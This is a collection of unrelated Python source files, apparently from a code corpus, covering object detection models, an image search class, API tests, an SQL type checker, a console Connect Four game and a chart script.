summaries.image_summaries_boxes(self.images,
self.gt_num_boxes,
self.gt_boxes,
prediction_dict,
self.params)
with tf.variable_scope("TotalLoss"):
# Get total loss
total_loss = reg_loss
for loss_value in losses_dict.values():
total_loss += loss_value
tf.summary.scalar('total', total_loss, family='losses')
return total_loss
def prepare_gt(self):
groundtruth_dict = dict()
if self.apply_instance_branch:
groundtruth_dict_ins = self.instance_segmentation.format_gt_dict(self.instance_gt)
groundtruth_dict.update(groundtruth_dict_ins)
if self.apply_semantic_branch:
groundtruth_dict_sem = {'labels': self.labels}
groundtruth_dict.update(groundtruth_dict_sem)
self.groundtruth_dict = groundtruth_dict
@staticmethod
def save(saver, sess, logdir, step):
model_name = 'model.ckpt'
checkpoint_path = os.path.join(logdir, model_name)
if not os.path.exists(logdir):
os.makedirs(logdir)
saver.save(sess, checkpoint_path, global_step=step)
print('The checkpoint has been created.')
@staticmethod
def load(saver, sess, ckpt_path):
saver.restore(sess, ckpt_path)
print("Restored model parameters from {}".format(ckpt_path))
if __name__ == '__main__':
pass
|
486152
|
from fastapi_hypermodel.hypermodel import _uri_schema
def _is_subset(d1: dict, d2: dict):
return all(d1.get(k) == d2.get(k) for k in d2)
def test_openapi_schema_href(app):
openapi = app.openapi()
href_schema = openapi["components"]["schemas"]["Person"]["properties"]["href"]
assert _is_subset(href_schema, _uri_schema)
def test_openapi_schema_linkset(app):
openapi = app.openapi()
linkset_schema = openapi["components"]["schemas"]["Person"]["properties"]["links"]
assert linkset_schema["type"] == "object"
assert _is_subset(linkset_schema["additionalProperties"], _uri_schema)
|
486172
|
import sys
class Tipo():
def __init__(self, tipo=None, valor=None, size=0, decimales=0):
'Obtener el valor de la Instrruccion'
self.valor = valor
self.tipo = tipo
self.size = size
self.decimales = decimales
def devString(self):
cad: str = str(self.tipo)
if self.size > 0:
cad += '(' + str(self.size)
if self.decimales > 0:
cad += ',' + str(self.decimales)
if self.size > 0 or self.decimales > 0:
cad += ')'
return cad
def tipoInt(self):
'devueleve el tipo indicado de tipo int'
if self.valor <= 32767 and self.valor >= -32768:
self.tipo = 'smallint'
elif self.valor <= 2147483647 and self.valor >= -2147483648:
self.tipo = 'integer'
elif self.valor <= 9223372036854775807 and self.valor >= -9223372036854775808:
self.tipo = 'bigint'
def tipoDecimal(self):
'devueleve el tipo indicado de tipo decimal'
decimales = str(self.valor).split('.')
if len(decimales[1]) <= 6:
self.tipo = 'real'
elif len(decimales[1]) <= 15:
if self.valor >= -92233720368547758.08 and self.valor <= 92233720368547758.07:
self.tipo = 'money'
self.tipo = 'double'
else:
self.tipo = 'decimal'
def getTipo(self):
if self.tipo == 'int':
return self.tipoInt()
elif self.tipo == 'decimal':
return self.tipoDecimal()
else:
return self.tipo
def comparetipo(self, tipocolumn, tipovalor):
'comparo los tipos de la columna con el del valor'
tipovalor.tipo = tipovalor.tipo.lower()
tipocolumn.tipo = tipocolumn.tipo.lower()
if tipocolumn.tipo == 'int':
tipocolumn.tipo = 'integer'
if tipovalor.tipo in ('decimal', 'numeric', 'double', 'real', 'money'):
tipovalor.size = tipovalor.size - 1
if tipocolumn.size >= tipovalor.size or tipocolumn.size == -1:
if tipocolumn.tipo == 'decimal' or tipocolumn.tipo == 'numeric':
if tipovalor.tipo == 'decimal' or tipovalor.tipo == 'numeric' or tipovalor.tipo == 'bigint' or tipovalor.tipo == 'smallint' or tipovalor.tipo == 'integer' or tipovalor.tipo == 'money' or tipovalor.tipo == 'double' or tipovalor.tipo == 'real':
return True
elif tipocolumn.tipo == 'double':
if tipovalor.tipo == 'double' or tipovalor.tipo == 'bigint' or tipovalor.tipo == 'smallint' or tipovalor.tipo == 'integer' or tipovalor.tipo == 'money' or tipovalor.tipo == 'real':
return True
elif tipocolumn.tipo == 'money':
if tipovalor.tipo == 'bigint' or tipovalor.tipo == 'smallint' or tipovalor.tipo == 'integer' or tipovalor.tipo == 'money' or tipovalor.tipo == 'real':
return True
elif tipocolumn.tipo == 'real':
if tipovalor.tipo == 'bigint' or tipovalor.tipo == 'smallint' or tipovalor.tipo == 'integer' or tipovalor.tipo == 'real':
return True
elif tipocolumn.tipo == 'bigint':
if tipovalor.tipo == 'bigint' or tipovalor.tipo == 'smallint' or tipovalor.tipo == 'integer':
return True
elif tipocolumn.tipo == 'integer':
if tipovalor.tipo == 'smallint' or tipovalor.tipo == 'integer':
return True
elif tipocolumn.tipo == 'smallint':
if tipovalor.tipo == 'smallint':
return True
elif tipocolumn.tipo in ('varchar', 'char', 'character varyng', 'text', 'character'):
if tipovalor.tipo in ('varchar', 'char', 'character varyng', 'text', 'character'):
return True
elif tipocolumn.tipo == 'timestamp without time zone':
if tipovalor.tipo in ('date', 'timestamp without time zone'):
return True
elif tipocolumn.tipo == 'date':
if tipovalor.tipo in ('date', 'timestamp without time zone'):
return True
elif tipocolumn.tipo == 'time without time zone':
if tipovalor.tipo in ('time without time zone', 'timestamp without time zone'):
return True
elif tipocolumn.tipo == 'boolean':
if tipovalor.tipo == 'boolean':
return True
|
486176
|
class Tracker:
def __init__(self, con):
self.con = con
def get_tracking(self):
tracking = dict()
for notice in self.con.notices:
splits = notice.split()
if splits[1] == 'TRACK':
if splits[2] in tracking:
tracking[splits[2]].append(splits[3:])
else:
tracking[splits[2]] = [splits[3:]]
return tracking
def clear_track(self):
self.con.notices.clear()
|
486243
|
import os
import time
import wget
import paddle
from PIL import Image
from .translator import Translator
from clip import tokenize, load_model
class IMSP:
def __init__(self, db_file=None):
self.model, self.transforms = load_model('ViT_B_32', pretrained=True)
if db_file is None:
db_file = 'image_db'
db_url = 'https://bj.bcebos.com/v1/ai-studio-online/775e9601019646b2a09f717789a4602f069a26302f8643418ec7c2370b895da9?responseContentDisposition=attachment%3B%20filename%3Dimage_db'
if not os.path.isfile(db_file):
wget.download(db_url)
self.image_features, self.photo_ids = self.load_db(db_file)
self.translator = Translator()
@staticmethod
def load_db(db_file):
image_db = paddle.load(db_file)
image_features = image_db['image_features'].astype('float32')
image_features = paddle.to_tensor(image_features)
photo_ids = image_db['photo_ids']
return image_features, photo_ids
@staticmethod
def get_urls(photo_ids):
urls = []
for photo_id in photo_ids:
url = f"https://unsplash.com/photos/{photo_id}"
urls.append(url)
return urls
@staticmethod
def is_chinese(texts):
return any('\u4e00' <= char <= '\u9fff' for char in texts)
def im_search(self, texts, topk=5, return_urls=True):
if self.is_chinese(texts):
texts = self.translator.translate(texts)
texts = tokenize(texts)
with paddle.no_grad():
text_features = self.model.encode_text(texts)
logit_scale = self.model.logit_scale.exp()
logits_per_text = logit_scale * text_features @ self.image_features.t()
indexs = logits_per_text.topk(topk)[1][0]
photo_ids = [self.photo_ids[index] for index in indexs]
if return_urls:
return self.get_urls(photo_ids)
else:
return photo_ids
def im_pair(self, images, topk=5, return_urls=True):
images = Image.open(images)
images = self.transforms(images).unsqueeze(0)
with paddle.no_grad():
image_features = self.model.encode_image(images)
logit_scale = self.model.logit_scale.exp()
logits = logit_scale * image_features @ self.image_features.t()
indexs = logits.topk(topk)[1][0]
photo_ids = [self.photo_ids[index] for index in indexs]
if return_urls:
return self.get_urls(photo_ids)
else:
return photo_ids
def im_search_pair(self, images=None, texts=None, topk=5, return_urls=True):
if images is not None:
if isinstance(images, list):
input_images = []
for image in images:
image = Image.open(image)
image = self.transforms(image).unsqueeze(0)
input_images.append(image)
input_images = paddle.concat(input_images)
elif isinstance(images, str):
input_images = Image.open(images)
input_images = self.transforms(input_images).unsqueeze(0)
with paddle.no_grad():
image_features = self.model.encode_image(input_images)
if texts is not None:
if isinstance(texts, list):
input_texts = []
for text in texts:
if self.is_chinese(text):
input_texts.append(self.translator.translate(text))
time.sleep(1)
else:
input_texts.append(text)
elif isinstance(texts, str):
if self.is_chinese(texts):
input_texts = self.translator.translate(texts)
else:
input_texts = texts
input_texts = tokenize(input_texts)
with paddle.no_grad():
text_features = self.model.encode_text(input_texts)
if images and texts:
features = paddle.concat([image_features, text_features], 0)
features = paddle.sum(features, axis=0, keepdim=True)
elif images:
features = paddle.sum(image_features, axis=0, keepdim=True)
elif texts:
features = paddle.sum(text_features, axis=0, keepdim=True)
logit_scale = self.model.logit_scale.exp()
logits = logit_scale * features @ self.image_features.t()
indexs = logits.topk(topk)[1][0]
photo_ids = [self.photo_ids[index] for index in indexs]
if return_urls:
return self.get_urls(photo_ids)
else:
return photo_ids
|
486249
|
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# from torchvision.ops import PSRoIPool
from torch_resnet import ResNet_BaseNet
from config import opt
from RPN import RegionProposalNetwork, normal_init
from utils.bbox_tools import totensor, tonumpy, loc2bbox
from data.dataset import preprocess
from utils.psroi_module import PSRoIPooling2D
class RFCN(nn.Module):
"""
R-FCN base class
"""
def __init__(self,
extractor_phase1,
rpn: RegionProposalNetwork,
head,
loc_normalize_mean=(0., 0., 0., 0.),
loc_normalize_std=(0.1, 0.1, 0.2, 0.2)):
super(RFCN, self).__init__()
self.extractor_phase1 = extractor_phase1
self.rpn = rpn
self.head = head
# mean and std
self.loc_normalize_mean = loc_normalize_mean
self.loc_normalize_std = loc_normalize_std
self.use_preset('evaluate')
self.class_num = opt.class_num
self.n_cls_reg = self.class_num if opt.cls_reg_specific else 2
def forward(self, x, scale=1.):
"""
:param x: x (autograd.Variable): 4D image variable.
:param scale: Amount of scaling applied to the raw image during preprocessing.
:return:
* **roi_cls_locs**: Offsets and scalings for the proposed RoIs. \
Its shape is :math:`(R', (L + 1) \\times 4)`.
* **roi_scores**: Class predictions for the proposed RoIs. \
Its shape is :math:`(R', L + 1)`.
* **rois_batch**: RoIs proposed by RPN. Its shape is \
:math:`(R', 4)`.
* **rois_batch_indices**: Batch indices of RoIs. Its shape is \
:math:`(R',)`.
"""
# height and width
img_size = x.shape[2:]
h = self.extractor_phase1(x)
rpn_locs, rpn_scores, rois_batch, rois_batch_indices, anchor = \
self.rpn(h, img_size, scale)
# shape:(R, 4 * num_cls_reg) & (R, class_num_withBg)
rois_batch = totensor(rois_batch).float()
rois_batch_indices = totensor(rois_batch_indices)
roi_locs, roi_scores = self.head(h, rois_batch, rois_batch_indices)
return roi_locs, roi_scores, rois_batch, rois_batch_indices
def use_preset(self, preset):
"""Use the given preset during prediction.
This method changes values of :obj:`self.nms_thresh` and
:obj:`self.score_thresh`. These values are a threshold value
used for non maximum suppression and a threshold value
to discard low confidence proposals in :meth:`predict`,
respectively.
If the attributes need to be changed to something
other than the values provided in the presets, please modify
them by directly accessing the public attributes.
Args:
preset ({'visualize', 'evaluate'): A string to determine the
preset to use.
"""
if preset == "visualize":
self.nms_thresh = 0.3
self.score_thresh = 0.7
elif preset == "evaluate":
self.nms_thresh = 0.3
self.score_thresh = 0.05
else:
raise ValueError("preset must be 'visualize' or 'evaluate'")
@torch.no_grad()
def predict(self, imgs, sizes=None, visualize=False):
"""Detect objects from images.
This method predicts objects for each image.
Args:
imgs (iterable of numpy.ndarray): Arrays holding images.
All images are in CHW and RGB format
and the range of their value is :math:`[0, 255]`.
Returns:
tuple of lists:
This method returns a tuple of three lists,
:obj:`(bboxes, labels, scores)`.
* **bboxes**: A list of float arrays of shape :math:`(R, 4)`, \
where :math:`R` is the number of bounding boxes in a image. \
Each bouding box is organized by \
:math:`(y_{min}, x_{min}, y_{max}, x_{max})` \
in the second axis.
* **labels** : A list of integer arrays of shape :math:`(R,)`. \
Each value indicates the class of the bounding box. \
Values are in range :math:`[0, L - 1]`, where :math:`L` is the \
number of the foreground classes.
* **scores** : A list of float arrays of shape :math:`(R,)`. \
Each value indicates how confident the prediction is.
"""
self.eval()
if visualize:
self.use_preset('visualize')
prepared_imgs = list()
sizes = list()
for img in imgs:
size = img.shape[1:] # original height & width
img, _ = preprocess(tonumpy(img))
prepared_imgs.append(img)
sizes.append(size)
else:
self.use_preset('evaluate')
prepared_imgs = imgs
b_bboxes = list()
b_labels = list()
b_scores = list()
for i, (img, size) in enumerate(zip(prepared_imgs, sizes)):
img = totensor(img[None]).float() # Expand a dimension
scale = img.shape[3] / size[1] # scale ratio
roi_locs, roi_scores, rois, roi_indices = self(img, scale=scale)
# We are assuming that batch size is 1.
roi_score = roi_scores.data # shape: (Ri, self.class_num)
roi_loc = roi_locs.data # shape: (Ri, n_cls_reg * 4)
# Convert predictions to bounding boxes in image coordinates.
# Bounding boxes are scaled to the scale of the input images.
roi = totensor(rois) / scale
# denormalize
mean = torch.Tensor(self.loc_normalize_mean).cuda().repeat(self.n_cls_reg)[None]
std = torch.Tensor(self.loc_normalize_std).cuda().repeat(self.n_cls_reg)[None]
roi_loc = (roi_loc * std + mean)
roi_loc = roi_loc.view(-1, self.n_cls_reg, 4)
roi = roi.view(-1, 1, 4).expand_as(roi_loc)
roi_bbox = loc2bbox(tonumpy(roi).reshape((-1, 4)),
tonumpy(roi_loc).reshape(-1, 4))
roi_bbox = totensor(roi_bbox)
roi_bbox = roi_bbox.view(-1, self.n_cls_reg * 4)
# clip bounding box
roi_bbox[:, 0::2] = (roi_bbox[:, 0::2]).clamp(min=0, max=size[0])
roi_bbox[:, 1::2] = (roi_bbox[:, 1::2]).clamp(min=0, max=size[1])
prob = F.softmax(totensor(roi_score), dim=1)
bboxes, labels, scores = self._suppress(roi_bbox, prob)
b_bboxes.append(bboxes)
b_labels.append(labels)
b_scores.append(scores)
self.train()
return b_bboxes, b_labels, b_scores
def _suppress(self, raw_bbox, raw_prob):
"""
NMS for each class
:param raw_cls_bbox: Tensor, all predict bboxes
:param raw_prob: Tensor, confidence of predict bboxes after softmax
:return:
"""
raw_bbox = raw_bbox.reshape((-1, self.n_cls_reg, 4))
bboxes, labels, scores = list(), list(), list()
# skip cls_id = 0 because it is the background class
for l in range(1, self.class_num):
# class agnostic: the same regression factors for all classes(different conf)
# class specific: different regression factors for different class
if opt.cls_reg_specific:
bbox_l = raw_bbox[:, l, :]
else:
bbox_l = raw_bbox[:, 1, :]
prob_l = raw_prob[:, l]
# filter by confidence threshold
mask = prob_l > self.score_thresh
bbox_l = bbox_l[mask]
prob_l = prob_l[mask]
keep = torchvision.ops.nms(bbox_l, prob_l, self.nms_thresh)
bboxes.append(bbox_l[keep])
scores.append(prob_l[keep])
# predict label is 0-19
labels.append((l-1) * np.ones((len(keep), ), dtype=np.int32))
bboxes = tonumpy(torch.cat(bboxes, dim=0)).astype(np.float32)
scores = tonumpy(torch.cat(scores, dim=0)).astype(np.float32)
labels = np.concatenate(labels, axis=0).astype(np.int32)
return bboxes, labels, scores
class ResNet101_PsROI_Head(nn.Module):
"""
ROI Head of R-FCN
"""
def __init__(self, class_num, k, spatial_scale, extractor_phase2):
"""
:param class_num: the number of classes (include background)
:param k: the number of bin for psRoI
:param spatial_scale stride of the feature extractor(ex:1/16.)
:param extractor_phase2 feature extractor 2
"""
super(ResNet101_PsROI_Head, self).__init__()
self.class_num = class_num
self.k = k
self.spatial_scale = spatial_scale
self.n_cls_reg = class_num if opt.cls_reg_specific else 2
self.extractor_phase2 = extractor_phase2
self.generatePsScoreMap = nn.Conv2d(1024, self.k * self.k * self.class_num, kernel_size=(1, 1), bias=True)
self.generateLocMap = nn.Conv2d(1024, self.k * self.k * self.n_cls_reg * 4, kernel_size=(1, 1), bias=True)
# self.psROI_score = PSRoIPool(self.k, spatial_scale=self.spatial_scale)
# self.psROI_loc = PSRoIPool(self.k, spatial_scale=self.spatial_scale)
self.psROI_score = PSRoIPooling2D(pool_size=self.k, spatial_scale=self.spatial_scale)
self.psROI_loc = PSRoIPooling2D(pool_size=self.k, spatial_scale=self.spatial_scale)
self.avg_pool_score = nn.AvgPool2d(kernel_size=self.k, stride=self.k)
self.avg_pool_loc = nn.AvgPool2d(kernel_size=self.k, stride=self.k)
from utils.psroi_module import acitvate_PsROI_for_eval
acitvate_PsROI_for_eval(self.psROI_score)
normal_init(self.generatePsScoreMap, 0, 0.01)
normal_init(self.generateLocMap, 0, 0.01)
def forward(self, x, rois, roi_indices):
"""
forward of psRoI
:param x: input feature map
:param rois: rois, torch.tensor, shape:(S1+...+Sn, 4), here 4<==>(y_min, x_min, y_max, x_max)
:param roi_indices: Batch to which it belongs, shape: torch.tensor([0, 0, ..., 1, 1, ...])
:return:
roi_locs, (tx, ty, tw, th), shape:(sum(roi_num_i), 4)
roi_scores, class confidence, shape:(sum(roi_num_i), ClassNum)
"""
"""combine rois and indices"""
indices_and_rois = torch.cat([roi_indices[:, None], rois], dim=1)
# ([y_min, x_min, y_max, x_max] ==> [x_min, y_min, x_max, y_max])
xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
indices_and_rois = xy_indices_and_rois.contiguous()
"""extract feature again"""
h = self.extractor_phase2(x)
"""roi classification"""
score_map = self.generatePsScoreMap(h) # channels: k^2 * (C+1), shape:(b, C, H, W)
# shape:(sum(roi_num_i) for all batch, ClassNum, k, k)
score_pooling = self.psROI_score(score_map, indices_and_rois)
roi_scores = self.avg_pool_score(score_pooling) # shape:(sum(roi_num_i), ClassNum, 1, 1)
roi_scores = roi_scores.squeeze() # shape:(sum(roi_num_i), ClassNum)
"""roi regression"""
loc_map = self.generateLocMap(h) # channels: k^2 * 4 * n_cls_reg, shape:(b, C, H, W)
# shape:(sum(roi_num_i) for all batch, n_cls_reg * 4, k, k)
loc_pooling = self.psROI_loc(loc_map, indices_and_rois)
roi_locs = self.avg_pool_loc(loc_pooling) # shape:(sum(roi_num_i), n_cls_reg * 4, 1, 1)
roi_locs = roi_locs.squeeze() # shape:(sum(roi_num_i), n_cls_reg * 4) ==> here 4 is (ty, tx, tw, th)
return roi_locs, roi_scores
from torchvision.ops import RoIPool
class VGG16RoIHead(nn.Module):
"""
ROI Head of Faster R-CNN
"""
def __init__(self, n_class, roi_size, spatial_scale, extractor_phase2):
# n_class includes the background
super(VGG16RoIHead, self).__init__()
self.extractor_phase2 = extractor_phase2
from torchvision.models import vgg16
vgg_weights_path = '/home/elbert/mount/win_data/model_para/vgg16-dict.pth'
model = vgg16(pretrained=False)
model.load_state_dict(torch.load(vgg_weights_path))
classifier = model.classifier
del classifier[6]
del classifier[5]
del classifier[2]
self.n_cls_reg = n_class if opt.cls_reg_specific else 2
self.classifier = classifier
self.cls_loc = nn.Linear(4096, self.n_cls_reg * 4)
self.score = nn.Linear(4096, n_class)
normal_init(self.cls_loc, 0, 0.001)
normal_init(self.score, 0, 0.01)
self.n_class = n_class
self.roi_size = roi_size
self.spatial_scale = spatial_scale
self.roi = RoIPool((self.roi_size, self.roi_size), self.spatial_scale)
def forward(self, x, rois, roi_indices):
indices_and_rois = torch.cat([roi_indices[:, None], rois], dim=1)
# (yx ==> xy)
xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
indices_and_rois = xy_indices_and_rois.contiguous()
h = self.extractor_phase2(x)
pool = self.roi(h, indices_and_rois)
pool = pool.view(pool.size(0), -1)
fc7 = self.classifier(pool)
roi_cls_locs = self.cls_loc(fc7)
roi_scores = self.score(fc7)
return roi_cls_locs, roi_scores
class RFCN_ResNet101(RFCN):
"""
R-FCN base on resnet101
"""
# stride ==> 16
feat_stride = 16
def __init__(self,
ratios=[0.5, 1, 2],
anchor_scales=[8, 16, 32]):
extractor_phase1, extractor_phase2 = ResNet_BaseNet(opt.load_resnet101_path)
# fix ResNet parameters
for layer in extractor_phase1[:4+opt.FIXED_BLOCKS]:
for p in layer.parameters():
p.requires_grad = False
normal_init(extractor_phase2._modules['dim_sub'], 0, 0.01)
# fix BN layer
def set_bn_fix(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
for p in m.parameters():
p.requires_grad = False
extractor_phase1.apply(set_bn_fix)
extractor_phase2.apply(set_bn_fix)
rpn = RegionProposalNetwork(
in_channels=1024,
mid_channels=512,
ratios=ratios,
anchor_scales=anchor_scales,
feat_stride=self.feat_stride)
# fix RPN parameters
if opt.FIX_RPN:
for p in rpn.parameters():
p.requires_grad = False
head = ResNet101_PsROI_Head(opt.class_num, opt.roi_k,
spatial_scale=(1. / self.feat_stride),
extractor_phase2=extractor_phase2)
if opt.head_ver is not None:
head = VGG16RoIHead(opt.class_num, opt.roi_k, spatial_scale=(1. / self.feat_stride),
extractor_phase2=extractor_phase2) # vgg16 roi head
# fix Head parameters
if opt.FIX_HEAD:
for p in extractor_phase2.parameters():
p.requires_grad = False
for p in head.parameters():
p.requires_grad = False
super(RFCN_ResNet101, self).__init__(
extractor_phase1,
rpn,
head)
def train(self, mode=True):
# Override train so that the training mode is set as we want
nn.Module.train(self, mode)
if mode:
self.extractor_phase1.eval()
for fix_layer in range(6, 3 + opt.FIXED_BLOCKS, -1):
self.extractor_phase1[fix_layer].train()
# Set batchnorm always in eval mode during training or testing!
def set_bn_eval(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
self.extractor_phase1.apply(set_bn_eval)
self.head.extractor_phase2.apply(set_bn_eval)
|
486251
|
from .transductive_experiment import TransductiveExperiment
from .multiple_run_experiment import MultipleRunExperiment
from .dataset import ExperimentDataset
|
486261
|
from detectron2.layers import batched_nms, cat
from detectron2.structures import Boxes, Instances
def fast_rcnn_inference(boxes, scores, image_shapes, score_thresh, nms_thresh, topk_per_image):
"""
Call `fast_rcnn_inference_single_image` for all images.
Args:
boxes (list[Tensor]): A list of Tensors of predicted class-specific or class-agnostic
boxes for each image. Element i has shape (Ri, K * 4) if doing
class-specific regression, or (Ri, 4) if doing class-agnostic
regression, where Ri is the number of predicted objects for image i.
This is compatible with the output of :meth:`FastRCNNOutputs.predict_boxes`.
scores (list[Tensor]): A list of Tensors of predicted class scores for each image.
Element i has shape (Ri, K + 1), where Ri is the number of predicted objects
for image i. Compatible with the output of :meth:`FastRCNNOutputs.predict_probs`.
image_shapes (list[tuple]): A list of (width, height) tuples for each image in the batch.
score_thresh (float): Only return detections with a confidence score exceeding this
threshold.
nms_thresh (float): The threshold to use for box non-maximum suppression. Value in [0, 1].
topk_per_image (int): The number of top scoring detections to return. Set < 0 to return
all detections.
Returns:
instances: (list[Instances]): A list of N instances, one for each image in the batch,
that stores the topk most confidence detections.
kept_indices: (list[Tensor]): A list of 1D tensor of length of N, each element indicates
the corresponding boxes/scores index in [0, Ri) from the input, for image i.
"""
result_per_image = [
fast_rcnn_inference_single_image(
boxes_per_image, scores_per_image, image_shape, score_thresh, nms_thresh, topk_per_image
)
for scores_per_image, boxes_per_image, image_shape in zip(scores, boxes, image_shapes)
]
return tuple(list(x) for x in zip(*result_per_image))
def fast_rcnn_inference_single_image(
boxes, scores, image_shape, score_thresh, nms_thresh, topk_per_image
):
"""
Single-image inference. Return bounding-box detection results by thresholding
on scores and applying non-maximum suppression (NMS).
Args:
Same as `fast_rcnn_inference`, but with boxes, scores, and image shapes
per image.
Returns:
Same as `fast_rcnn_inference`, but for only one image.
"""
scores = scores[:, :-1]
num_bbox_reg_classes = boxes.shape[1] // 4
# Convert to Boxes to use the `clip` function ...
boxes = Boxes(boxes.reshape(-1, 4))
boxes.clip(image_shape)
boxes = boxes.tensor.view(-1, num_bbox_reg_classes, 4) # R x C x 4
# Filter results based on detection scores
filter_mask = scores > score_thresh # R x K
# R' x 2. First column contains indices of the R predictions;
# Second column contains indices of classes.
filter_inds = filter_mask.nonzero()
if num_bbox_reg_classes == 1:
boxes = boxes[filter_inds[:, 0], 0]
else:
boxes = boxes[filter_mask]
scores = scores[filter_mask]
# Apply per-class NMS
keep = batched_nms(boxes, scores, filter_inds[:, 1], nms_thresh)
if topk_per_image >= 0:
keep = keep[:topk_per_image]
boxes, scores, filter_inds = boxes[keep], scores[keep], filter_inds[keep]
result = Instances(image_shape)
result.pred_boxes = Boxes(boxes)
result.scores = scores
result.pred_classes = filter_inds[:, 1]
return result, boxes, scores, keep
|
486269
|
from random import choice
from time import sleep
class Game:
def __init__(self):
self.map = []
self.p1 = 0
self.p2 = 0
self.game = False
def set_up(self):
a = 0
self.game = True
self.map = [[],[],[],[],[],[]]
while a < len(self.map):
while len(self.map[a]) < 6:
self.map[a].append(' ')
a +=1
user = input('What piece do you want to be represented by: R or Y ? ').lower()
if user=='r':
self.p1 ='R'
self.p2 = 'Y'
elif user=='y':
self.p1 = 'Y'
self.p2 = 'R'
else:
self.p1 = 'R'
self.p2 = 'Y'
def display(self,n):
a = str(n).replace("[",'')
b = a.replace(',','|')
c = b.replace("'","")
d = c.replace(']','')
print('|',d,'|')
def display2(self):
print(' 0 1 2 3 4 5')
print('-'*20)
for i in self.map:
self.display(i)
print('-'*20)
def play1(self):
self.display2()
col = 0
try:
col = eval(input('Pick a column: '))
except:
NameError
TypeError
ValueError
SyntaxError
print('Try Again')
self.play1()
if col not in range(0,6):
print('Out of range')
self.play1()
else:
if self.game==True:
self.insert(col,self.p1)
def check_full(self):
c = 0
a = 0
r = 0
while a < 6:
while r < 6:
if self.map[a][r] in ['R','Y']:
c +=1
r +=1
r = 0
a+=1
if c >=36:
print('FULL')
self.game = False
self.set_up()
def check_map(self,n):
a = 0 #row
b = 0 #space
c = 0 #counting
while a < 6:
while b < 6:
if self.map[a][b]==n:
c +=1
else:
c = 0
if c >=4:
self.game = False
b +=1
b = 0
a +=1
a = 0 #row
b = 0 #space
while b < 6:
while a < 6:
if self.map[a][b]==n:
c +=1
else:
c = 0
if c>=4:
self.game = False
a +=1
b +=1
a = 0
b = 0
def insert(self,n,u):
a = 5
p = False
while a !=-1:
if self.map[a][n] not in ['R','Y']:
if p==False:
self.map[a][n] = u
p = True
a -=1
self.check_full()
if self.game==True:
self.check_map(u)
def play1_com(self):
n = choice([0,1,2,3,4,5])
print(n)
sleep(1)
if self.game==True:
self.display2()
self.insert(n,self.p1)
def play2(self):
n = choice([0,1,2,3,4,5])
print(n)
sleep(1)
if self.game==True:
self.display2()
self.insert(n,self.p2)
def cycle(self):
self.set_up()
mode = input('1.YOU vs COM\n2.COM vs COM: ')
if mode=='2':
while self.game==True:
self.play1_com()
self.play2()
else:
while self.game==True:
self.play1()
self.play2()
print('GAME OVER')
game = Game()
game.cycle()
|
486278
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("simpleAnalysis")
# initialize MessageLogger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
#Take 2007H4TB geometry
#process.load("Configuration.EcalTB.2007TBH4GeometryXML_cfi");
process.load("Geometry.CMSCommonData.ecalhcalGeometryXML_cfi");
process.load("Geometry.CaloEventSetup.CaloGeometry_cff")
#process.load("Geometry.CaloEventSetup.EcalTrigTowerConstituents_cfi")
process.CaloGeometryBuilder.SelectedCalos = ['EcalEndcap']
process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(int(10000)))
process.source = cms.Source("PoolSource",
# untracked vstring fileNames = {'rfio:/castor/cern.ch/cms/archive/ecal/h4tb.pool-cmssw-SM12/h4b.00015217.A.0.0.root'}
fileNames = cms.untracked.vstring('file:hits.root')
)
process.simple2007H4TBanalysis = cms.EDAnalyzer("EcalSimple2007H4TBAnalyzer",
rootfile = cms.untracked.string('ecalSimple2007H4TBAnalysis.root'),
eventHeaderProducer = cms.string('ecalTBunpack'),
hitProducer = cms.string('ecal2007TBWeightUncalibRecHit'),
digiCollection = cms.string('eeDigis'),
tdcRecInfoCollection = cms.string('EcalTBTDCRecInfo'),
digiProducer = cms.string('ecalTBunpack'),
hitCollection = cms.string('EcalUncalibRecHitsEE'),
hodoRecInfoProducer = cms.string('ecal2006TBHodoscopeReconstructor'),
eventHeaderCollection = cms.string(''),
hodoRecInfoCollection = cms.string('EcalTBHodoscopeRecInfo'),
tdcRecInfoProducer = cms.string('ecal2007H4TBTDCReconstructor')
)
process.p = cms.Path(process.simple2007H4TBanalysis)
|
486280
|
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
# ----------------------
# 40 under 40 grid chart
# ----------------------
df = pd.read_csv("datasets/40under40.csv")
categories = remove_duplicates(df['category'])
data = pd.DataFrame([[dict(row) for _,row in df[df['category'] == cat].iterrows()] for cat in categories], index=categories)
default_img = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg"
def process(d):
return Image.from_column([
Image.from_url_with_cache(d.get("image_url", default_img)).crop_to_aspect(100, 100, (0.5, 0.2)).resize_fixed_aspect(width=160),
Image.from_text(d['name'], arial(12, bold=True), padding=(2, 5, 2, 0), fg="white", bg="black"),
Image.from_text("{}, {}".format(d['age'], d['cause']), font("arial", 12), padding=(2,1,2,0), fg="white", bg="black")
])
title = Image.from_column([
Image.from_text("40 under 40: historic figures who died young", arial(48, bold=True), fg="white", bg="black"),
Image.from_text("“It is a sobering thought, for example, that when Mozart was my age, he had been dead for two years.” — <NAME>", arial(24), max_width=750, fg="white", bg="black")
], bg="black").pad((0,25), "black")
footer = Image.from_row([
Image.from_text("* ages and death causes from Wikipedia.", font=arial(14), fg="white", bg="black", padding=5),
Image.from_text("/u/Udzu", font("arial", 14), fg="white", bg="black", padding=5).pad((1,1,0,0), "white")
], bg="black")
grid = grid_chart(data, process, padding=5, col_label=None, label_font=arial(20, bold=True), bg="black", title=title).pad((0,0,10,0), "black")
img = Image.from_column([grid, footer], bg="black", xalign=1, padding=5)
img.save("output/40under40.png")
|
486315
|
from .base import BaseCFObject
class Output(BaseCFObject):
top_level_key = 'Outputs'
task_batch_resource_attr = 'batch_outputs'
|
486329
|
from __future__ import absolute_import, division, print_function
import telnyx
TEST_RESOURCE_ID = "1293384261075731499"
class TestAddress(object):
def test_is_listable(self, request_mock):
resources = telnyx.Address.list()
request_mock.assert_requested("get", "/v2/addresses")
assert isinstance(resources.data, list)
assert isinstance(resources.data[0], telnyx.Address)
def test_is_retrievable(self, request_mock):
resource = telnyx.Address.retrieve(TEST_RESOURCE_ID)
